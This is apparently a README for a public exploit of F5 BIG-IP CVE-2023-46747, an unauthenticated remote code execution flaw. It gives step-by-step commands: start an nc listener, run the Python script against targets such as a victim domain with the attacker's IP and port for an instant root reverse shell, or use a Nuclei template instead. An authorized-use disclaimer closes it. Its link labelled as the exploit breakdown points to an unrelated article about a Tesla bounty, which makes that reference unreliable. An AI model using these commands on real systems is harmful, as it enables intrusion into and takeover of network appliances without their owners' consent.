
#F5-BIG-IP-CVE-2023-46747-Exploit – Неавторизованный RCE Python эксплойт и шаблон Nuclei от Raguraman ✓ Автоматическая обратная TCP-оболочка (LHOST/LPORT) ✓ Протестировано на уязвимых BIG-IP 13.x–17.x ⚠️ Только для авторизованного пентестинга
Версии Python3 и Nuclei – от raguraman
Критическое неавторизованное RCE (CVSS 9.8) через AJP + контрабанда HTTP-запросов
Работает на всех необновленных BIG-IP 13.x → 17.x (включая последний 17.1.0.3)
Патч: https://my.f5.com/manage/s/article/K000137353 (Ноябрь 2023)
Реальный разбор эксплойта: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd
f5-bigip-cve-2023-46747-revshell.py → автономный Python3 (рекомендуется)CVE-2023-46747-revshell.yaml → шаблон Nuclei (опционально)# 1. Start your listener
nc -lvnp 4444
# 2. Run the exploit (works with IP or domain)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50 YOUR_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com YOUR_IP 4444
# → Instant root shell!
Использование – шаблон Nuclei (альтернатива) Bash # 1. Отредактируйте LHOST и LPORT внутри YAML-файла
nc -lvnp 4444
nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com
Этот инструмент предназначен исключительно для авторизованного тестирования безопасности, например:
Одобренные пентесты
Операции красной команды с письменного разрешения
Исследования в контролируемой лабораторной среде
Не используйте этот эксплойт на системах, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения. Несанкционированное использование незаконно и может повлечь уголовное преследование.
Используя этот инструмент, вы принимаете на себя полную ответственность за соблюдение применимых законов. Автор не несет ответственности за любое неправомерное использование или ущерб.